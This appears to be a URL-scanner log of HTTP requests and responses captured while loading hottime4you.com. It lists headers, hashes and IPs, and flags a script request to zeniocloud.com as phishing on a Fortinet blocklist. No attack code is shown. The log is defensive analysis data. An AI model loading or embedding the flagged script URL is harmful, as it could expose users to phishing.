via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:57:01 GMT
age: 35335
etag: "5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8308
Md5:    59c6121e6f6cb833939e12585aca131e
Sha1:   5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df
Sha256: 88b8a458ad437bf40d154b21d844ba56530ae05c2f42b417cfb0e6cffcb294e5
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6315
x-amzn-requestid: 6aa75b16-32e4-48a7-9fb0-9e3d5528c2d5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZWSdsHUnIAMFXtw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6338cabd-742d8a436403683e0cd9368f;Sampled=0
x-amzn-remapped-date: Sat, 01 Oct 2022 23:18:21 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 5sAzc5Ewv4g6Wqq6JJiLylG3Jyy_nlWrr5Oteeo6ebEgq7Rvss4XaQ==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 09331f0822fc98eebaf04130a83dbd44.cloudfront.net (CloudFront), 1.1 google
date: Tue, 04 Oct 2022 04:42:53 GMT
age: 10983
etag: "58ff0bf8ce7528b303d28bab01a80ad721705569"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6315
Md5:    206fb65e75dbadf119512f71e0b78402
Sha1:   58ff0bf8ce7528b303d28bab01a80ad721705569
Sha256: 56c8d5f3b3060ee54bf81995269b86c070855d8c33bf437161339a45b309703f
                                        
                                            GET /css?family=Quattrocento+Sans HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 07:45:54 GMT
date: Tue, 04 Oct 2022 07:45:54 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /JAIA.js?sub1=hottime4you.com HTTP/1.1 
Host: zeniocloud.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         167.114.67.56
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.18.0 (Ubuntu)
date: Tue, 04 Oct 2022 07:45:55 GMT
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v3/signin/identifier?dsh=S1728465341%3A1664869555910079&continue=https%3A%2F%2Flh3.google.com%2Fu%2F0%2Fd%2F1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQDHYWo4lWoJZtUxa6xluLoa-HBEwbqzVuiyH4jecC_Tbm9IR9DEKuHonBBjrkQHeOwhu4ogvQgp-w HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         216.58.207.237
HTTP/2 403 Forbidden
content-type: text/html; charset=utf-8
                                        
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Tue, 04 Oct 2022 07:45:55 GMT
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-opener-policy-report-only: same-origin
content-security-policy: script-src 'nonce-peZlyF0UF5LDvJeKwui_eA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self', script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlist, require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
set-cookie: NID=511=gyXSs8_BHs-E50LXm5bqTUdKrlO-bzdHO_2fGknvrkcn4v3j6YyYiiiWUxiioltcOQVjvewWwP3QwHrujczC57OTcA_-pb3mzeoPLeuvlTPFAUa9Wasl_dXyXEwY_sm5gediDU-EwCXyWIhiemBPE76hS7yWUeRKyVsaixMv-jc; expires=Wed, 05-Apr-2023 07:45:55 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---